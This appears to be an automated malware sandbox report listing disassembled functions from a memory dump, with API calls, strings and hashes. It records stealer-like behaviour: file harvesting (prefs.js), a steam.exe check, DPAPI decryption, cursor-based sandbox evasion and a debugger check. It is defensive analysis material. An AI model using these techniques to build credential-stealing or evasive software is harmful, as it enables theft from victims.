Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 81e1c17deccb1a5f427406fb91c64b1b3f5a03d5bf532cd29d151c585d64fa43
Instruction ID: 4430173b8545abbf8eac73fc61fb5ebbba3ad5735d5f4ae5047b4a4bd72f9f8f
Opcode Fuzzy Hash: 81e1c17deccb1a5f427406fb91c64b1b3f5a03d5bf532cd29d151c585d64fa43
Instruction Fuzzy Hash: BFA1E5319006289FDF60BB64EC46BCD77B4BF45310F4101E1E988B7252EB30AE9A9F91

Function 0008B93F Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

FindFirstFileA.KERNEL32(?,?,\*.*,000B6826,?,?,?), ref: 0008B99B
StrCmpCA.SHLWAPI(?,000B743C), ref: 0008B9BC
StrCmpCA.SHLWAPI(?,000B7440), ref: 0008B9D6

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

CopyFileA.KERNEL32(?,?,00000001), ref: 0008BE0B

Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

DeleteFileA.KERNEL32(?), ref: 0008BE82

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E

FindNextFileA.KERNEL32(?,?), ref: 0008BEF1
FindClose.KERNEL32(?), ref: 0008BF05

Strings

\*.*, xrefs: 0008B965

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2055012574-1173974218
Opcode ID: be0b3690430d85b6b9585045823b90713213767a6e07d2b12e1520556c5ad985
Instruction ID: 627fc64ae0af26029e944f2c15d023df4a46f61cc54c6104ef79b8f45121a412
Opcode Fuzzy Hash: be0b3690430d85b6b9585045823b90713213767a6e07d2b12e1520556c5ad985
Instruction Fuzzy Hash: 43E16131950529DFCF21FB24DD4AACDB7B4BF44305F4140E1A998BB122DB35AE8A9F90

Function 0008B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

FindFirstFileA.KERNEL32(?,?,000B7424,000B6822,?,?,?), ref: 0008B657
StrCmpCA.SHLWAPI(?,000B7428), ref: 0008B678
StrCmpCA.SHLWAPI(?,000B742C), ref: 0008B692
StrCmpCA.SHLWAPI(?,000B7430,?,000B6823), ref: 0008B71F
StrCmpCA.SHLWAPI(?), ref: 0008B780

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 0008ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0008AC8A

FindNextFileA.KERNEL32(?,?), ref: 0008B8EB
FindClose.KERNEL32(?), ref: 0008B8FF

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: c96dfccbac96231e21a8e4109e8825dc9a36b00a4ded0dbdb277477a508a3d72
Instruction ID: c5584129d68d3f1f15f3964f4bf00ef272dcf60dceacc83a9f604d2b561ac107
Opcode Fuzzy Hash: c96dfccbac96231e21a8e4109e8825dc9a36b00a4ded0dbdb277477a508a3d72
Instruction Fuzzy Hash: 0D81E97190051C9FCF60FB74EC4AADD77B8AB04314F8501A1E888A7252EB349E599FD1

Function 000924A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 000924B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000924D4
Process32First.KERNEL32(00000000,00000128), ref: 000924E4
Process32Next.KERNEL32(00000000,00000128), ref: 000924F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00092508
CloseHandle.KERNEL32(00000000), ref: 00092521

Strings

steam.exe, xrefs: 000924B7, 00092500

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 19a9f817ffe153850d95c84f4c8f8200ca5de700e24f62ec503c00a2b7469c43
Instruction ID: eaf6df38ef4735d64a6468574ae3347d63103d2939d2c594430b8cf9f2858048
Opcode Fuzzy Hash: 19a9f817ffe153850d95c84f4c8f8200ca5de700e24f62ec503c00a2b7469c43
Instruction Fuzzy Hash: C501E170902115EFDF60AFA4EC49BDE77F8AF05350F5501E5E409E6190EB349E419B51

Function 0008180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00081823
SetThreadDesktop.USER32(00000000), ref: 0008182A
GetCursorPos.USER32(?), ref: 0008183A
Sleep.KERNEL32(000003E8), ref: 0008184A
GetCursorPos.USER32(?), ref: 00081859
Sleep.KERNEL32(00002710), ref: 0008186B
Sleep.KERNEL32(000003E8), ref: 00081870
GetCursorPos.USER32(?), ref: 0008187F

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: 924e730e223d16f0dde4b232d18bb27703f9618d32ce829bdb98fc163e1ea46f
Instruction ID: f93b9aede91c05b805123c6861be8782840dddd7121c5ed24cd4cbafc2bcb1ea
Opcode Fuzzy Hash: 924e730e223d16f0dde4b232d18bb27703f9618d32ce829bdb98fc163e1ea46f
Instruction Fuzzy Hash: 6B110A31E10219EBDB60EBA4CD8ABEE77BDBF44351F240966D541A2080DB74EA46CB61

Function 0008A7D8 Relevance: 9.1, APIs: 6, Instructions: 94stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0008A815
lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A830
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0008A838
_memmove.LIBCMT ref: 0008A8BB
lstrcatA.KERNEL32(000B6803,000B6807,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A8E5
lstrcatA.KERNEL32(000B6803,000B680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A8FB

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
String ID:
API String ID: 943939369-0
Opcode ID: 4987f548ab4eddbf5aa055e53017704f82bf154d1cf8c4e33aa041808ffca417
Instruction ID: 44f1c34214b81923e78c92126a4867c39cf076113f62f9d5f65493928b731b91
Opcode Fuzzy Hash: 4987f548ab4eddbf5aa055e53017704f82bf154d1cf8c4e33aa041808ffca417
Instruction Fuzzy Hash: 96311BB1D0411AAFDB10AB64ED889FEB7B8AF09340F4500B6B509A6141EB745E859F62

Function 000AB0CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,000AB735,?,000A84E6,?,000000BC,?), ref: 000AB10B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,000AB735,?,000A84E6,?,000000BC,?), ref: 000AB134
GetACP.KERNEL32(?,?,000AB735,?,000A84E6,?,000000BC,?), ref: 000AB148

Strings

ACP, xrefs: 000AB0DB
OCP, xrefs: 000AB0EC

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 00fd78ebc74ed70801bf2a4eb3a7d2eec8e5428f297d3f68882808ddb88f25e4
Instruction ID: cf3b9b4791b699f54dfe46ad1e92a8bad36b6f3f39d7b621117186d8d04aee3f
Opcode Fuzzy Hash: 00fd78ebc74ed70801bf2a4eb3a7d2eec8e5428f297d3f68882808ddb88f25e4
Instruction Fuzzy Hash: 5301F731601606BAEB659BA4EC16FDF37E8DF06369F500169F201E40C3EB64CE41D654

Function 0009D016 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0009D44E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0009D463
UnhandledExceptionFilter.KERNEL32(000B332C), ref: 0009D46E
GetCurrentProcess.KERNEL32(C0000409), ref: 0009D48A
TerminateProcess.KERNEL32(00000000), ref: 0009D491

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 2607cfbec3df130bc535292fe3e9335a756be86b8178cf5a5439a659ff949b3c
Instruction ID: 8d5b298d8f15f53821f4381a9f4f301682fabe10d2f02c9d6586f0b49112c2fd
Opcode Fuzzy Hash: 2607cfbec3df130bc535292fe3e9335a756be86b8178cf5a5439a659ff949b3c
Instruction Fuzzy Hash: 4A21C3B8852300EFF740EF68FD486A47BB4FB68304F10851BE91887260E7B899818F65

Function 000880A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0008823B), ref: 000880C4
LocalAlloc.KERNEL32(00000040,0008823B,?,?,0008823B,0008CB95,?,?,?,?,?,?,?,0008CC90,?,?), ref: 000880D8
LocalFree.KERNEL32(0008CB95,?,?,0008823B,0008CB95,?,?,?,?,?,?,?,0008CC90,?,?), ref: 000880FD

Strings

DPAPI, xrefs: 000880A9

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
